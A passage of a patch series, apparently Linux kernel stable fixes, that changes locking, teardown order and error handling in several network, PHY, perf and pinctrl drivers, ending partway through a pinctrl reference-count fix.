+--- a/drivers/mcb/mcb-parse.c
++++ b/drivers/mcb/mcb-parse.c
+@@ -99,8 +99,6 @@ static int chameleon_parse_gdd(struct mcb_bus *bus,
+ 	mdev->mem.end = mdev->mem.start + size - 1;
+ 	mdev->mem.flags = IORESOURCE_MEM;
+ 
+-	mdev->is_added = false;
+-
+ 	ret = mcb_device_register(bus, mdev);
+ 	if (ret < 0)
+ 		goto err;
+diff --git a/drivers/net/can/Kconfig b/drivers/net/can/Kconfig
+index 8236aabebb394..e45b95a13157b 100644
+--- a/drivers/net/can/Kconfig
++++ b/drivers/net/can/Kconfig
+@@ -174,7 +174,7 @@ config CAN_SLCAN
+ 
+ config CAN_SUN4I
+ 	tristate "Allwinner A10 CAN controller"
+-	depends on MACH_SUN4I || MACH_SUN7I || RISCV || COMPILE_TEST
++	depends on MACH_SUN4I || MACH_SUN7I || (RISCV && ARCH_SUNXI) || COMPILE_TEST
+ 	help
+ 	  Say Y here if you want to use CAN controller found on Allwinner
+ 	  A10/A20/D1 SoCs.
+diff --git a/drivers/net/dsa/qca/qca8k-8xxx.c b/drivers/net/dsa/qca/qca8k-8xxx.c
+index b3f7988668996..1e94ba1031ece 100644
+--- a/drivers/net/dsa/qca/qca8k-8xxx.c
++++ b/drivers/net/dsa/qca/qca8k-8xxx.c
+@@ -544,6 +544,15 @@ qca8k_phy_eth_command(struct qca8k_priv *priv, bool read, int phy,
+ 		goto err_read_skb;
+ 	}
+ 
++	/* It seems that accessing the switch's internal PHYs via management
++	 * packets still uses the MDIO bus within the switch internally, and
++	 * these accesses can conflict with external MDIO accesses to other
++	 * devices on the MDIO bus.
++	 * We therefore need to lock the MDIO bus onto which the switch is
++	 * connected.
++	 */
++	mutex_lock(&priv->bus->mdio_lock);
++
+ 	/* Actually start the request:
+ 	 * 1. Send mdio master packet
+ 	 * 2. Busy Wait for mdio master command
+@@ -556,6 +565,7 @@ qca8k_phy_eth_command(struct qca8k_priv *priv, bool read, int phy,
+ 	mgmt_master = priv->mgmt_master;
+ 	if (!mgmt_master) {
+ 		mutex_unlock(&mgmt_eth_data->mutex);
++		mutex_unlock(&priv->bus->mdio_lock);
+ 		ret = -EINVAL;
+ 		goto err_mgmt_master;
+ 	}
+@@ -643,6 +653,7 @@ exit:
+ 				    QCA8K_ETHERNET_TIMEOUT);
+ 
+ 	mutex_unlock(&mgmt_eth_data->mutex);
++	mutex_unlock(&priv->bus->mdio_lock);
+ 
+ 	return ret;
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+index 29cc609880712..ea88ac04ab9ad 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+@@ -28,6 +28,9 @@ static inline void ixgbe_alloc_vf_macvlans(struct ixgbe_adapter *adapter,
+ 	struct vf_macvlans *mv_list;
+ 	int num_vf_macvlans, i;
+ 
++	/* Initialize list of VF macvlans */
++	INIT_LIST_HEAD(&adapter->vf_mvs.l);
++
+ 	num_vf_macvlans = hw->mac.num_rar_entries -
+ 			  (IXGBE_MAX_PF_MACVLANS + 1 + num_vfs);
+ 	if (!num_vf_macvlans)
+@@ -36,8 +39,6 @@ static inline void ixgbe_alloc_vf_macvlans(struct ixgbe_adapter *adapter,
+ 	mv_list = kcalloc(num_vf_macvlans, sizeof(struct vf_macvlans),
+ 			  GFP_KERNEL);
+ 	if (mv_list) {
+-		/* Initialize list of VF macvlans */
+-		INIT_LIST_HEAD(&adapter->vf_mvs.l);
+ 		for (i = 0; i < num_vf_macvlans; i++) {
+ 			mv_list[i].vf = -1;
+ 			mv_list[i].free = true;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index 0f8f3ce35537d..a7832a0180ee6 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -611,7 +611,7 @@ static int mlx5e_macsec_upd_txsa(struct macsec_context *ctx)
+ 		goto out;
+ 	}
+ 
+-	if (tx_sa->next_pn != ctx_tx_sa->next_pn_halves.lower) {
++	if (ctx->sa.update_pn) {
+ 		netdev_err(netdev, "MACsec offload: update TX sa %d PN isn't supported\n",
+ 			   assoc_num);
+ 		err = -EINVAL;
+@@ -1016,7 +1016,7 @@ static int mlx5e_macsec_upd_rxsa(struct macsec_context *ctx)
+ 		goto out;
+ 	}
+ 
+-	if (rx_sa->next_pn != ctx_rx_sa->next_pn_halves.lower) {
++	if (ctx->sa.update_pn) {
+ 		netdev_err(ctx->netdev,
+ 			   "MACsec offload update RX sa %d PN isn't supported\n",
+ 			   assoc_num);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+index 4e7daa382bc05..42e6f2fcf5f59 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c
+@@ -3862,13 +3862,14 @@ static int set_feature_rx_fcs(struct net_device *netdev, bool enable)
+ 	struct mlx5e_channels *chs = &priv->channels;
+ 	struct mlx5e_params new_params;
+ 	int err;
++	bool rx_ts_over_crc = !enable;
+ 
+ 	mutex_lock(&priv->state_lock);
+ 
+ 	new_params = chs->params;
+ 	new_params.scatter_fcs_en = enable;
+ 	err = mlx5e_safe_switch_params(priv, &new_params, mlx5e_set_rx_port_ts_wrap,
+-				       &new_params.scatter_fcs_en, true);
++				       &rx_ts_over_crc, true);
+ 	mutex_unlock(&priv->state_lock);
+ 	return err;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
+index d309b77a01944..cdd8818b49d0a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_nve_vxlan.c
+@@ -308,8 +308,8 @@ const struct mlxsw_sp_nve_ops mlxsw_sp1_nve_vxlan_ops = {
+ 	.fdb_clear_offload = mlxsw_sp_nve_vxlan_clear_offload,
+ };
+ 
+-static bool mlxsw_sp2_nve_vxlan_learning_set(struct mlxsw_sp *mlxsw_sp,
+-					     bool learning_en)
++static int mlxsw_sp2_nve_vxlan_learning_set(struct mlxsw_sp *mlxsw_sp,
++					    bool learning_en)
+ {
+ 	char tnpc_pl[MLXSW_REG_TNPC_LEN];
+ 
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index 4f4204432aaa3..b751b03eddfb1 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -1003,17 +1003,21 @@ static void mana_poll_tx_cq(struct mana_cq *cq)
+ 		case CQE_TX_VPORT_IDX_OUT_OF_RANGE:
+ 		case CQE_TX_VPORT_DISABLED:
+ 		case CQE_TX_VLAN_TAGGING_VIOLATION:
+-			WARN_ONCE(1, "TX: CQE error %d: ignored.\n",
+-				  cqe_oob->cqe_hdr.cqe_type);
++			if (net_ratelimit())
++				netdev_err(ndev, "TX: CQE error %d\n",
++					   cqe_oob->cqe_hdr.cqe_type);
++
+ 			break;
+ 
+ 		default:
+-			/* If the CQE type is unexpected, log an error, assert,
+-			 * and go through the error path.
++			/* If the CQE type is unknown, log an error,
++			 * and still free the SKB, update tail, etc.
+ 			 */
+-			WARN_ONCE(1, "TX: Unexpected CQE type %d: HW BUG?\n",
+-				  cqe_oob->cqe_hdr.cqe_type);
+-			return;
++			if (net_ratelimit())
++				netdev_err(ndev, "TX: unknown CQE type %d\n",
++					   cqe_oob->cqe_hdr.cqe_type);
++
++			break;
+ 		}
+ 
+ 		if (WARN_ON_ONCE(txq->gdma_txq_id != completions[i].wq_num))
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/cmsg.c b/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
+index f21cf1f40f987..153533cd8f086 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/cmsg.c
+@@ -210,6 +210,7 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 	unsigned int msg_len = nfp_flower_cmsg_get_data_len(skb);
+ 	struct nfp_flower_cmsg_merge_hint *msg;
+ 	struct nfp_fl_payload *sub_flows[2];
++	struct nfp_flower_priv *priv;
+ 	int err, i, flow_cnt;
+ 
+ 	msg = nfp_flower_cmsg_get_data(skb);
+@@ -228,14 +229,15 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 		return;
+ 	}
+ 
+-	rtnl_lock();
++	priv = app->priv;
++	mutex_lock(&priv->nfp_fl_lock);
+ 	for (i = 0; i < flow_cnt; i++) {
+ 		u32 ctx = be32_to_cpu(msg->flow[i].host_ctx);
+ 
+ 		sub_flows[i] = nfp_flower_get_fl_payload_from_ctx(app, ctx);
+ 		if (!sub_flows[i]) {
+ 			nfp_flower_cmsg_warn(app, "Invalid flow in merge hint\n");
+-			goto err_rtnl_unlock;
++			goto err_mutex_unlock;
+ 		}
+ 	}
+ 
+@@ -244,8 +246,8 @@ nfp_flower_cmsg_merge_hint_rx(struct nfp_app *app, struct sk_buff *skb)
+ 	if (err == -ENOMEM)
+ 		nfp_flower_cmsg_warn(app, "Flow merge memory fail.\n");
+ 
+-err_rtnl_unlock:
+-	rtnl_unlock();
++err_mutex_unlock:
++	mutex_unlock(&priv->nfp_fl_lock);
+ }
+ 
+ static void
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index f693119541d55..f7492be452aed 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1971,8 +1971,6 @@ nfp_fl_ct_offload_nft_flow(struct nfp_fl_ct_zone_entry *zt, struct flow_cls_offl
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
+ 	struct netlink_ext_ack *extack = NULL;
+ 
+-	ASSERT_RTNL();
+-
+ 	extack = flow->common.extack;
+ 	switch (flow->command) {
+ 	case FLOW_CLS_REPLACE:
+@@ -2015,9 +2013,13 @@ int nfp_fl_ct_handle_nft_flow(enum tc_setup_type type, void *type_data, void *cb
+ 
+ 	switch (type) {
+ 	case TC_SETUP_CLSFLOWER:
+-		rtnl_lock();
++		while (!mutex_trylock(&zt->priv->nfp_fl_lock)) {
++			if (!zt->nft) /* avoid deadlock */
++				return err;
++			msleep(20);
++		}
+ 		err = nfp_fl_ct_offload_nft_flow(zt, flow);
+-		rtnl_unlock();
++		mutex_unlock(&zt->priv->nfp_fl_lock);
+ 		break;
+ 	default:
+ 		return -EOPNOTSUPP;
+@@ -2045,6 +2047,7 @@ int nfp_fl_ct_del_flow(struct nfp_fl_ct_map_entry *ct_map_ent)
+ 	struct nfp_fl_ct_flow_entry *ct_entry;
+ 	struct nfp_fl_ct_zone_entry *zt;
+ 	struct rhashtable *m_table;
++	struct nf_flowtable *nft;
+ 
+ 	if (!ct_map_ent)
+ 		return -ENOENT;
+@@ -2061,8 +2064,12 @@ int nfp_fl_ct_del_flow(struct nfp_fl_ct_map_entry *ct_map_ent)
+ 		nfp_fl_ct_clean_flow_entry(ct_entry);
+ 		kfree(ct_map_ent);
+ 
+-		if (!zt->pre_ct_count) {
+-			zt->nft = NULL;
++		if (!zt->pre_ct_count && zt->nft) {
++			nft = zt->nft;
++			zt->nft = NULL; /* avoid deadlock */
++			nf_flow_table_offload_del_cb(nft,
++						     nfp_fl_ct_handle_nft_flow,
++						     zt);
+ 			nfp_fl_ct_clean_nft_entries(zt);
+ 		}
+ 		break;
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/main.h b/drivers/net/ethernet/netronome/nfp/flower/main.h
+index cb799d18682d9..d0ab71ce3d84f 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/main.h
++++ b/drivers/net/ethernet/netronome/nfp/flower/main.h
+@@ -281,6 +281,7 @@ struct nfp_fl_internal_ports {
+  * @predt_list:		List to keep track of decap pretun flows
+  * @neigh_table:	Table to keep track of neighbor entries
+  * @predt_lock:		Lock to serialise predt/neigh table updates
++ * @nfp_fl_lock:	Lock to protect the flow offload operation
+  */
+ struct nfp_flower_priv {
+ 	struct nfp_app *app;
+@@ -323,6 +324,7 @@ struct nfp_flower_priv {
+ 	struct list_head predt_list;
+ 	struct rhashtable neigh_table;
+ 	spinlock_t predt_lock; /* Lock to serialise predt/neigh table updates */
++	struct mutex nfp_fl_lock; /* Protect the flow operation */
+ };
+ 
+ /**
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/metadata.c b/drivers/net/ethernet/netronome/nfp/flower/metadata.c
+index 0f06ef6e24bf4..80e4675582bfb 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/metadata.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/metadata.c
+@@ -528,6 +528,8 @@ int nfp_flower_metadata_init(struct nfp_app *app, u64 host_ctx_count,
+ 	if (err)
+ 		goto err_free_stats_ctx_table;
+ 
++	mutex_init(&priv->nfp_fl_lock);
++
+ 	err = rhashtable_init(&priv->ct_zone_table, &nfp_zone_table_params);
+ 	if (err)
+ 		goto err_free_merge_table;
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/offload.c b/drivers/net/ethernet/netronome/nfp/flower/offload.c
+index 8593cafa63683..99165694f1367 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/offload.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/offload.c
+@@ -1009,8 +1009,6 @@ int nfp_flower_merge_offloaded_flows(struct nfp_app *app,
+ 	u64 parent_ctx = 0;
+ 	int err;
+ 
+-	ASSERT_RTNL();
+-
+ 	if (sub_flow1 == sub_flow2 ||
+ 	    nfp_flower_is_merge_flow(sub_flow1) ||
+ 	    nfp_flower_is_merge_flow(sub_flow2))
+@@ -1727,19 +1725,30 @@ static int
+ nfp_flower_repr_offload(struct nfp_app *app, struct net_device *netdev,
+ 			struct flow_cls_offload *flower)
+ {
++	struct nfp_flower_priv *priv = app->priv;
++	int ret;
++
+ 	if (!eth_proto_is_802_3(flower->common.protocol))
+ 		return -EOPNOTSUPP;
+ 
++	mutex_lock(&priv->nfp_fl_lock);
+ 	switch (flower->command) {
+ 	case FLOW_CLS_REPLACE:
+-		return nfp_flower_add_offload(app, netdev, flower);
++		ret = nfp_flower_add_offload(app, netdev, flower);
++		break;
+ 	case FLOW_CLS_DESTROY:
+-		return nfp_flower_del_offload(app, netdev, flower);
++		ret = nfp_flower_del_offload(app, netdev, flower);
++		break;
+ 	case FLOW_CLS_STATS:
+-		return nfp_flower_get_stats(app, netdev, flower);
++		ret = nfp_flower_get_stats(app, netdev, flower);
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++	mutex_unlock(&priv->nfp_fl_lock);
++
++	return ret;
+ }
+ 
+ static int nfp_flower_setup_tc_block_cb(enum tc_setup_type type,
+@@ -1778,6 +1787,7 @@ static int nfp_flower_setup_tc_block(struct net_device *netdev,
+ 	repr_priv = repr->app_priv;
+ 	repr_priv->block_shared = f->block_shared;
+ 	f->driver_block_list = &nfp_block_cb_list;
++	f->unlocked_driver_cb = true;
+ 
+ 	switch (f->command) {
+ 	case FLOW_BLOCK_BIND:
+@@ -1876,6 +1886,8 @@ nfp_flower_setup_indr_tc_block(struct net_device *netdev, struct Qdisc *sch, str
+ 	     nfp_flower_internal_port_can_offload(app, netdev)))
+ 		return -EOPNOTSUPP;
+ 
++	f->unlocked_driver_cb = true;
++
+ 	switch (f->command) {
+ 	case FLOW_BLOCK_BIND:
+ 		cb_priv = nfp_flower_indr_block_cb_priv_lookup(app, netdev);
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c b/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
+index 99052a925d9ec..e7180b4793c7d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/qos_conf.c
+@@ -523,25 +523,31 @@ int nfp_flower_setup_qos_offload(struct nfp_app *app, struct net_device *netdev,
+ {
+ 	struct netlink_ext_ack *extack = flow->common.extack;
+ 	struct nfp_flower_priv *fl_priv = app->priv;
++	int ret;
+ 
+ 	if (!(fl_priv->flower_ext_feats & NFP_FL_FEATS_VF_RLIM)) {
+ 		NL_SET_ERR_MSG_MOD(extack, "unsupported offload: loaded firmware does not support qos rate limit offload");
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	mutex_lock(&fl_priv->nfp_fl_lock);
+ 	switch (flow->command) {
+ 	case TC_CLSMATCHALL_REPLACE:
+-		return nfp_flower_install_rate_limiter(app, netdev, flow,
+-						       extack);
++		ret = nfp_flower_install_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	case TC_CLSMATCHALL_DESTROY:
+-		return nfp_flower_remove_rate_limiter(app, netdev, flow,
+-						      extack);
++		ret = nfp_flower_remove_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	case TC_CLSMATCHALL_STATS:
+-		return nfp_flower_stats_rate_limiter(app, netdev, flow,
+-						     extack);
++		ret = nfp_flower_stats_rate_limiter(app, netdev, flow, extack);
++		break;
+ 	default:
+-		return -EOPNOTSUPP;
++		ret = -EOPNOTSUPP;
++		break;
+ 	}
++	mutex_unlock(&fl_priv->nfp_fl_lock);
++
++	return ret;
+ }
+ 
+ /* Offload tc action, currently only for tc police */
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 894e2690c6437..9a52283d77544 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -2183,6 +2183,8 @@ static int ravb_close(struct net_device *ndev)
+ 			of_phy_deregister_fixed_link(np);
+ 	}
+ 
++	cancel_work_sync(&priv->work);
++
+ 	if (info->multi_irqs) {
+ 		free_irq(priv->tx_irqs[RAVB_NC], ndev);
+ 		free_irq(priv->rx_irqs[RAVB_NC], ndev);
+@@ -2907,8 +2909,6 @@ static int ravb_remove(struct platform_device *pdev)
+ 	clk_disable_unprepare(priv->gptp_clk);
+ 	clk_disable_unprepare(priv->refclk);
+ 
+-	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
+-			  priv->desc_bat_dma);
+ 	/* Set reset mode */
+ 	ravb_write(ndev, CCC_OPC_RESET, CCC);
+ 	unregister_netdev(ndev);
+@@ -2916,6 +2916,8 @@ static int ravb_remove(struct platform_device *pdev)
+ 		netif_napi_del(&priv->napi[RAVB_NC]);
+ 	netif_napi_del(&priv->napi[RAVB_BE]);
+ 	ravb_mdio_release(priv);
++	dma_free_coherent(ndev->dev.parent, priv->desc_bat_size, priv->desc_bat,
++			  priv->desc_bat_dma);
+ 	pm_runtime_put_sync(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 	reset_control_assert(priv->rstc);
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index d0b5129439ed6..c2201e0adc46c 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -2740,7 +2740,6 @@ static int ca8210_register_ext_clock(struct spi_device *spi)
+ 	struct device_node *np = spi->dev.of_node;
+ 	struct ca8210_priv *priv = spi_get_drvdata(spi);
+ 	struct ca8210_platform_data *pdata = spi->dev.platform_data;
+-	int ret = 0;
+ 
+ 	if (!np)
+ 		return -EFAULT;
+@@ -2757,18 +2756,8 @@ static int ca8210_register_ext_clock(struct spi_device *spi)
+ 		dev_crit(&spi->dev, "Failed to register external clk\n");
+ 		return PTR_ERR(priv->clk);
+ 	}
+-	ret = of_clk_add_provider(np, of_clk_src_simple_get, priv->clk);
+-	if (ret) {
+-		clk_unregister(priv->clk);
+-		dev_crit(
+-			&spi->dev,
+-			"Failed to register external clock as clock provider\n"
+-		);
+-	} else {
+-		dev_info(&spi->dev, "External clock set as clock provider\n");
+-	}
+ 
+-	return ret;
++	return of_clk_add_provider(np, of_clk_src_simple_get, priv->clk);
+ }
+ 
+ /**
+@@ -2780,8 +2769,8 @@ static void ca8210_unregister_ext_clock(struct spi_device *spi)
+ {
+ 	struct ca8210_priv *priv = spi_get_drvdata(spi);
+ 
+-	if (!priv->clk)
+-		return
++	if (IS_ERR_OR_NULL(priv->clk))
++		return;
+ 
+ 	of_clk_del_provider(spi->dev.of_node);
+ 	clk_unregister(priv->clk);
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 578f470e9fad9..81453e84b6413 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -2384,6 +2384,7 @@ static int macsec_upd_txsa(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		ctx.sa.assoc_num = assoc_num;
+ 		ctx.sa.tx_sa = tx_sa;
++		ctx.sa.update_pn = !!prev_pn.full64;
+ 		ctx.secy = secy;
+ 
+ 		ret = macsec_offload(ops->mdo_upd_txsa, &ctx);
+@@ -2477,6 +2478,7 @@ static int macsec_upd_rxsa(struct sk_buff *skb, struct genl_info *info)
+ 
+ 		ctx.sa.assoc_num = assoc_num;
+ 		ctx.sa.rx_sa = rx_sa;
++		ctx.sa.update_pn = !!prev_pn.full64;
+ 		ctx.secy = secy;
+ 
+ 		ret = macsec_offload(ops->mdo_upd_rxsa, &ctx);
+diff --git a/drivers/net/phy/mscc/mscc_macsec.c b/drivers/net/phy/mscc/mscc_macsec.c
+index f81b077618f40..81fd9bfef5271 100644
+--- a/drivers/net/phy/mscc/mscc_macsec.c
++++ b/drivers/net/phy/mscc/mscc_macsec.c
+@@ -844,6 +844,9 @@ static int vsc8584_macsec_upd_rxsa(struct macsec_context *ctx)
+ 	struct macsec_flow *flow;
+ 	int ret;
+ 
++	if (ctx->sa.update_pn)
++		return -EINVAL;
++
+ 	flow = vsc8584_macsec_find_flow(ctx, MACSEC_INGR);
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+@@ -897,6 +900,9 @@ static int vsc8584_macsec_upd_txsa(struct macsec_context *ctx)
+ 	struct macsec_flow *flow;
+ 	int ret;
+ 
++	if (ctx->sa.update_pn)
++		return -EINVAL;
++
+ 	flow = vsc8584_macsec_find_flow(ctx, MACSEC_EGR);
+ 	if (IS_ERR(flow))
+ 		return PTR_ERR(flow);
+diff --git a/drivers/net/usb/dm9601.c b/drivers/net/usb/dm9601.c
+index 48d7d278631e9..99ec1d4a972db 100644
+--- a/drivers/net/usb/dm9601.c
++++ b/drivers/net/usb/dm9601.c
+@@ -222,13 +222,18 @@ static int dm9601_mdio_read(struct net_device *netdev, int phy_id, int loc)
+ 	struct usbnet *dev = netdev_priv(netdev);
+ 
+ 	__le16 res;
++	int err;
+ 
+ 	if (phy_id) {
+ 		netdev_dbg(dev->net, "Only internal phy supported\n");
+ 		return 0;
+ 	}
+ 
+-	dm_read_shared_word(dev, 1, loc, &res);
++	err = dm_read_shared_word(dev, 1, loc, &res);
++	if (err < 0) {
++		netdev_err(dev->net, "MDIO read error: %d\n", err);
++		return err;
++	}
+ 
+ 	netdev_dbg(dev->net,
+ 		   "dm9601_mdio_read() phy_id=0x%02x, loc=0x%02x, returns=0x%04x\n",
+diff --git a/drivers/net/xen-netback/interface.c b/drivers/net/xen-netback/interface.c
+index f3f2c07423a6a..fc3bb63b9ac3e 100644
+--- a/drivers/net/xen-netback/interface.c
++++ b/drivers/net/xen-netback/interface.c
+@@ -41,8 +41,6 @@
+ #include <asm/xen/hypercall.h>
+ #include <xen/balloon.h>
+ 
+-#define XENVIF_QUEUE_LENGTH 32
+-
+ /* Number of bytes allowed on the internal guest Rx queue. */
+ #define XENVIF_RX_QUEUE_BYTES (XEN_NETIF_RX_RING_SIZE/2 * PAGE_SIZE)
+ 
+@@ -530,8 +528,6 @@ struct xenvif *xenvif_alloc(struct device *parent, domid_t domid,
+ 	dev->features = dev->hw_features | NETIF_F_RXCSUM;
+ 	dev->ethtool_ops = &xenvif_ethtool_ops;
+ 
+-	dev->tx_queue_len = XENVIF_QUEUE_LENGTH;
+-
+ 	dev->min_mtu = ETH_MIN_MTU;
+ 	dev->max_mtu = ETH_MAX_MTU - VLAN_ETH_HLEN;
+ 
+diff --git a/drivers/perf/arm-cmn.c b/drivers/perf/arm-cmn.c
+index 90008e24d1cc7..cfb36adf4eb80 100644
+--- a/drivers/perf/arm-cmn.c
++++ b/drivers/perf/arm-cmn.c
+@@ -1822,7 +1822,7 @@ static irqreturn_t arm_cmn_handle_irq(int irq, void *dev_id)
+ 		u64 delta;
+ 		int i;
+ 
+-		for (i = 0; i < CMN_DTM_NUM_COUNTERS; i++) {
++		for (i = 0; i < CMN_DT_NUM_COUNTERS; i++) {
+ 			if (status & (1U << i)) {
+ 				ret = IRQ_HANDLED;
+ 				if (WARN_ON(!dtc->counters[i]))
+diff --git a/drivers/phy/freescale/phy-fsl-lynx-28g.c b/drivers/phy/freescale/phy-fsl-lynx-28g.c
+index 569f12af2aafa..0a8b40edc3f31 100644
+--- a/drivers/phy/freescale/phy-fsl-lynx-28g.c
++++ b/drivers/phy/freescale/phy-fsl-lynx-28g.c
+@@ -126,6 +126,10 @@ struct lynx_28g_lane {
+ struct lynx_28g_priv {
+ 	void __iomem *base;
+ 	struct device *dev;
++	/* Serialize concurrent access to registers shared between lanes,
++	 * like PCCn
++	 */
++	spinlock_t pcc_lock;
+ 	struct lynx_28g_pll pll[LYNX_28G_NUM_PLL];
+ 	struct lynx_28g_lane lane[LYNX_28G_NUM_LANE];
+ 
+@@ -396,6 +400,8 @@ static int lynx_28g_set_mode(struct phy *phy, enum phy_mode mode, int submode)
+ 	if (powered_up)
+ 		lynx_28g_power_off(phy);
+ 
++	spin_lock(&priv->pcc_lock);
++
+ 	switch (submode) {
+ 	case PHY_INTERFACE_MODE_SGMII:
+ 	case PHY_INTERFACE_MODE_1000BASEX:
+@@ -412,6 +418,8 @@ static int lynx_28g_set_mode(struct phy *phy, enum phy_mode mode, int submode)
+ 	lane->interface = submode;
+ 
+ out:
++	spin_unlock(&priv->pcc_lock);
++
+ 	/* Power up the lane if necessary */
+ 	if (powered_up)
+ 		lynx_28g_power_on(phy);
+@@ -507,11 +515,12 @@ static void lynx_28g_cdr_lock_check(struct work_struct *work)
+ 	for (i = 0; i < LYNX_28G_NUM_LANE; i++) {
+ 		lane = &priv->lane[i];
+ 
+-		if (!lane->init)
+-			continue;
++		mutex_lock(&lane->phy->mutex);
+ 
+-		if (!lane->powered_up)
++		if (!lane->init || !lane->powered_up) {
++			mutex_unlock(&lane->phy->mutex);
+ 			continue;
++		}
+ 
+ 		rrstctl = lynx_28g_lane_read(lane, LNaRRSTCTL);
+ 		if (!(rrstctl & LYNX_28G_LNaRRSTCTL_CDR_LOCK)) {
+@@ -520,6 +529,8 @@ static void lynx_28g_cdr_lock_check(struct work_struct *work)
+ 				rrstctl = lynx_28g_lane_read(lane, LNaRRSTCTL);
+ 			} while (!(rrstctl & LYNX_28G_LNaRRSTCTL_RST_DONE));
+ 		}
++
++		mutex_unlock(&lane->phy->mutex);
+ 	}
+ 	queue_delayed_work(system_power_efficient_wq, &priv->cdr_check,
+ 			   msecs_to_jiffies(1000));
+@@ -592,6 +603,7 @@ static int lynx_28g_probe(struct platform_device *pdev)
+ 
+ 	dev_set_drvdata(dev, priv);
+ 
++	spin_lock_init(&priv->pcc_lock);
+ 	INIT_DELAYED_WORK(&priv->cdr_check, lynx_28g_cdr_lock_check);
+ 
+ 	queue_delayed_work(system_power_efficient_wq, &priv->cdr_check,
+@@ -603,6 +615,14 @@ static int lynx_28g_probe(struct platform_device *pdev)
+ 	return PTR_ERR_OR_ZERO(provider);
+ }
+ 
++static void lynx_28g_remove(struct platform_device *pdev)
++{
++	struct device *dev = &pdev->dev;
++	struct lynx_28g_priv *priv = dev_get_drvdata(dev);
++
++	cancel_delayed_work_sync(&priv->cdr_check);
++}
++
+ static const struct of_device_id lynx_28g_of_match_table[] = {
+ 	{ .compatible = "fsl,lynx-28g" },
+ 	{ },
+@@ -611,6 +631,7 @@ MODULE_DEVICE_TABLE(of, lynx_28g_of_match_table);
+ 
+ static struct platform_driver lynx_28g_driver = {
+ 	.probe	= lynx_28g_probe,
++	.remove_new = lynx_28g_remove,
+ 	.driver	= {
+ 		.name = "lynx-28g",
+ 		.of_match_table = lynx_28g_of_match_table,
+diff --git a/drivers/pinctrl/core.c b/drivers/pinctrl/core.c
+index 9e57f4c62e609..27e41873c04ff 100644
+--- a/drivers/pinctrl/core.c
++++ b/drivers/pinctrl/core.c
+@@ -1007,17 +1007,20 @@ static int add_setting(struct pinctrl *p, struct pinctrl_dev *pctldev,
+ 
+ static struct pinctrl *find_pinctrl(struct device *dev)
+ {
+-	struct pinctrl *p;
++	struct pinctrl *entry, *p = NULL;
+ 
+ 	mutex_lock(&pinctrl_list_mutex);
+-	list_for_each_entry(p, &pinctrl_list, node)
+-		if (p->dev == dev) {
+-			mutex_unlock(&pinctrl_list_mutex);
+-			return p;
++
++	list_for_each_entry(entry, &pinctrl_list, node) {
++		if (entry->dev == dev) {
++			p = entry;
++			kref_get(&p->users);
++			break;
+ 		}
++	}
+ 
